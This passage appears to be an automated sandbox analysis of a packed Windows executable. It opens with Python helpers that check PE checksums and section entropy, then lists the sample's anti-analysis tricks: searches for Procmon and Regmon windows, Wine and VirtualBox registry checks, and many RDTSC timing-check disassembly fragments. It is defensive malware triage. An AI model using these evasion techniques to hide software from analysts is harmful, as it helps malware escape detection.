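    padded = image + b"\0" * (-len(image) % 4)
    skip = field_offset & ~3
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def checksum_report(image: bytes) -> dict:
    """Mirror the report's 'real checksum ... should be ...' finding."""
    off = checksum_field_offset(image)
    stored = struct.unpack_from("<I", image, off)[0]
    expected = pe_checksum(image, off)
    return {"real": stored, "should_be": expected, "valid": stored == expected}


def build_stub_image(stored_checksum: int, body: bytes) -> bytes:
    """Constructed MZ/PE header stub (not loadable) followed by section bytes."""
    hdr = bytearray(0x100)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)            # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", hdr, 0x40 + 4 + 20 + 0x40, stored_checksum)
    return bytes(hdr) + body


# Constructed stand-ins for the sample's sections (seed: the analysis ID).
_rng = random.Random(1522624)
PACKED_SECTION = bytes(_rng.getrandbits(8) for _ in range(32768))
EMPTY_SECTION = bytes(32768)

if __name__ == "__main__":
    print(section_indicators("nouqlerf stand-in", PACKED_SECTION))
    print(section_indicators("zero-filled stand-in", EMPTY_SECTION))
    broken = build_stub_image(0, PACKED_SECTION)
    print(checksum_report(broken))          # stored 0: flagged as invalid
    fixed = build_stub_image(checksum_report(broken)["should_be"], PACKED_SECTION)
    print(checksum_report(fixed))           # stored value now matches
```

On a real file, read the whole image into bytes and pass it to checksum_report() and each section's raw bytes to section_indicators(); pefile's sections expose get_data() and its generate_checksum() gives the same number as pe_checksum() here. A checksum mismatch on its own is weak evidence (many legitimate builds leave the field zero), but combined with an 8-bit-entropy section whose name is random letters and an entry point outside the standard sections, as this report shows, it is the signature of a packer.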

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13358)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100BCB9 second address: 100BCDC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F72FCC0D446h 0x00000008 jmp 00007F72FCC0D459h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100BCDC second address: 100BCFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD3h 0x00000007 pushad 0x00000008 jmp 00007F72FCF2ACCBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100BCFF second address: 100BD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D44Eh 0x00000009 jmp 00007F72FCC0D455h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100BD2E second address: 100BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 jg 00007F72FCF2ACC6h 0x0000000e js 00007F72FCF2ACC6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1020D58 second address: 1020D72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72FCC0D451h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1020D72 second address: 1020D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1020ECA second address: 1020EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72FCC0D459h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10211F0 second address: 10211F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10211F6 second address: 102120E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCC0D454h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102120E second address: 1021230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F72FCF2ACDCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1021230 second address: 1021241 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F72FCC0D446h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102139D second address: 10213A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F72FCF2ACC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10213A9 second address: 10213AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10213AD second address: 10213B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10213B1 second address: 10213B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1025198 second address: 102519C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102519C second address: 10251BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F72FCC0D454h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10251BA second address: 10251E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F72FCF2ACCDh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c sub esi, dword ptr [ebp+122D1C44h] 0x00000012 push 00000000h 0x00000014 call 00007F72FCF2ACC9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c jg 00007F72FCF2ACC6h 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10251E9 second address: 10251F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F72FCC0D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10251F3 second address: 10251F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025353 second address: 1025359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025359 second address: 1025376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F72FCF2ACD2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025376 second address: 10253F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F72FCC0D448h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov eax, dword ptr [ebp+122D38D6h] 0x00000012 jmp 00007F72FCC0D44Ah 0x00000017 popad 0x00000018 jp 00007F72FCC0D457h 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D39EEh] 0x00000026 call 00007F72FCC0D449h 0x0000002b push eax 0x0000002c jmp 00007F72FCC0D454h 0x00000031 pop eax 0x00000032 push eax 0x00000033 pushad 0x00000034 jne 00007F72FCC0D448h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F72FCC0D453h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10253F2 second address: 102544D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72FCF2ACC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnp 00007F72FCF2ACD5h 0x00000015 jmp 00007F72FCF2ACCFh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jne 00007F72FCF2ACDBh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F72FCF2ACD4h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102544D second address: 10254F0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F72FCC0D44Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jc 00007F72FCC0D44Bh 0x00000011 mov edi, 6B9D3249h 0x00000016 push 00000003h 0x00000018 mov ecx, dword ptr [ebp+122D38F2h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F72FCC0D448h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a call 00007F72FCC0D44Dh 0x0000003f and di, 3986h 0x00000044 pop esi 0x00000045 adc dl, 00000037h 0x00000048 push 00000003h 0x0000004a mov di, si 0x0000004d mov edi, dword ptr [ebp+122D375Eh] 0x00000053 push 96A57100h 0x00000058 push ecx 0x00000059 push esi 0x0000005a pushad 0x0000005b popad 0x0000005c pop esi 0x0000005d pop ecx 0x0000005e xor dword ptr [esp], 56A57100h 0x00000065 mov si, di 0x00000068 lea ebx, dword ptr [ebp+1245703Ch] 0x0000006e xor dword ptr [ebp+122D2C2Ch], eax 0x00000074 xchg eax, ebx 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F72FCC0D454h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10254F0 second address: 10254F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025597 second address: 102559F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102559F second address: 1025625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 xor dword ptr [esp], 5DA6E96Ah 0x0000000f or dword ptr [ebp+122D2F2Ah], esi 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F72FCD84E88h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 sbb edx, 3578036Ch 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F72FCD84E88h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 push 00000003h 0x00000055 or dword ptr [ebp+122D301Bh], eax 0x0000005b push 9DD78600h 0x00000060 pushad 0x00000061 jmp 00007F72FCD84E95h 0x00000066 push eax 0x00000067 push edx 0x00000068 je 00007F72FCD84E86h 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044F5A second address: 1044F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F72FCF40426h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042FAD second address: 1042FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F72FCD84E86h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F72FCD84E86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104340D second address: 1043411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043411 second address: 1043417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043417 second address: 1043449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F72FCF40436h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F72FCF4042Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043449 second address: 104344F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043B47 second address: 1043B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038865 second address: 10388A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F72FCD84E86h 0x0000000c jmp 00007F72FCD84E92h 0x00000011 jmp 00007F72FCD84E8Ch 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F72FCD84E8Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440C4 second address: 10440CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440CD second address: 10440D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440D1 second address: 10440DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440DF second address: 10440E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10440E3 second address: 1044105 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72FCF40426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F72FCF40434h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044105 second address: 1044142 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72FCD84E86h 0x00000008 jmp 00007F72FCD84E98h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F72FCD84E99h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044142 second address: 1044146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446D8 second address: 10446EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCD84E8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044DD7 second address: 1044DF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F72FCF40432h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044DF1 second address: 1044E06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jno 00007F72FCD84E86h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044E06 second address: 1044E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104A656 second address: 104A65C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10494D5 second address: 10494DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10494DA second address: 1049502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jc 00007F72FCD84E86h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049502 second address: 1049507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049C8D second address: 1049C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD4E second address: 104AD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD52 second address: 104AD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F72FCD84E8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD60 second address: 104AD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F72FCF40432h 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F72FCF40426h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD8C second address: 104AD92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AF51 second address: 104AF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FB1A second address: 104FB4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E8Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F72FCD84E9Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FB4C second address: 104FB72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F72FCF40426h 0x00000009 jnc 00007F72FCF40426h 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F72FCF40433h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FCC7 second address: 104FCCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FCCD second address: 104FCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F72FCF40438h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FCEC second address: 104FD0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E8Ch 0x00000007 jmp 00007F72FCD84E90h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FFF2 second address: 104FFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F72FCF40426h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105197F second address: 1051984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051984 second address: 10519AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F72FCF40434h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519AA second address: 10519BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519BA second address: 10519D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCF40436h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519D4 second address: 10519D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10519D8 second address: 1051A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jg 00007F72FCF40443h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F72FCF40428h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D311Ch], edi 0x00000033 jmp 00007F72FCF40436h 0x00000038 call 00007F72FCF40429h 0x0000003d jnp 00007F72FCF4043Eh 0x00000043 jmp 00007F72FCF40438h 0x00000048 push eax 0x00000049 push ecx 0x0000004a pushad 0x0000004b jmp 00007F72FCF40430h 0x00000050 jns 00007F72FCF40426h 0x00000056 popad 0x00000057 pop ecx 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jns 00007F72FCF40426h 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105221D second address: 1052238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10527AB second address: 10527C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF40434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10527C3 second address: 1052810 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007F72FCD84E86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F72FCD84E99h 0x00000013 jmp 00007F72FCD84E93h 0x00000018 xchg eax, ebx 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F72FCD84E88h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 nop 0x00000034 push esi 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
